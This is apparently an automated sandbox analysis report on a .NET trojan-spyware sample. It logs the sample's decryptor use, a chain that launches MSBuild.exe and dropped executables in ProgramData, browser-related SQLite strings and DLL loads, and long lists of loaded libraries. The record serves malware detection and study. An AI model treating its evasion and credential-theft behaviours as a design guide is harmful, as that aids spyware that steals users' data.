Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.33a64d0.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.33a64d0.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.5950000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.5950000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe	Binary or memory string: MSB4098: MSBuild is invoking VCBuild to build this project. Project-to-project references between VC++ projects (.VCPROJ) and C#/VB/VJ# projects (.CSPROJ, .VBPROJ, .VJSPROJ) are not supported by the command-line build systems when building stand-alone VC++ projects. Projects that contain such project-to-project references will fail to build. Please build the solution file containing this project instead.
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe	Binary or memory string: MSB4126: The specified solution configuration "{0}" is invalid. Please specify a valid solution configuration using the Configuration and Platform properties (e.g. MSBuild.exe Solution.sln /p:Configuration=Debug /p:Platform="Any CPU") or leave those properties blank to use the default solution configuration.
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe	Binary or memory string: yMSB4051: Project {0} is referencing a project with GUID {1}, but a project with this GUID was not found in the .SLN file.

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/33@4/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_6C5C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6C5C7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,

1_2_00411400

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00410900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

1_2_00410900

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1lKbb2hF7fYToopfpmEvlyRN.exe.log

Jump to behavior

Source: C:\ProgramData\DGDBKFBAKF.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7280

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\60e15c14-ba06-4696-9779-531d632cc0fa

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe "C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe"
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\DBAAFIDGDA.exe "C:\ProgramData\DBAAFIDGDA.exe"
Source: C:\ProgramData\DBAAFIDGDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\DGDBKFBAKF.exe "C:\ProgramData\DGDBKFBAKF.exe"
Source: C:\ProgramData\DGDBKFBAKF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 2980
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\DBAAFIDGDA.exe "C:\ProgramData\DBAAFIDGDA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\DGDBKFBAKF.exe "C:\ProgramData\DGDBKFBAKF.exe"	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: version.dll	Jump to behavior
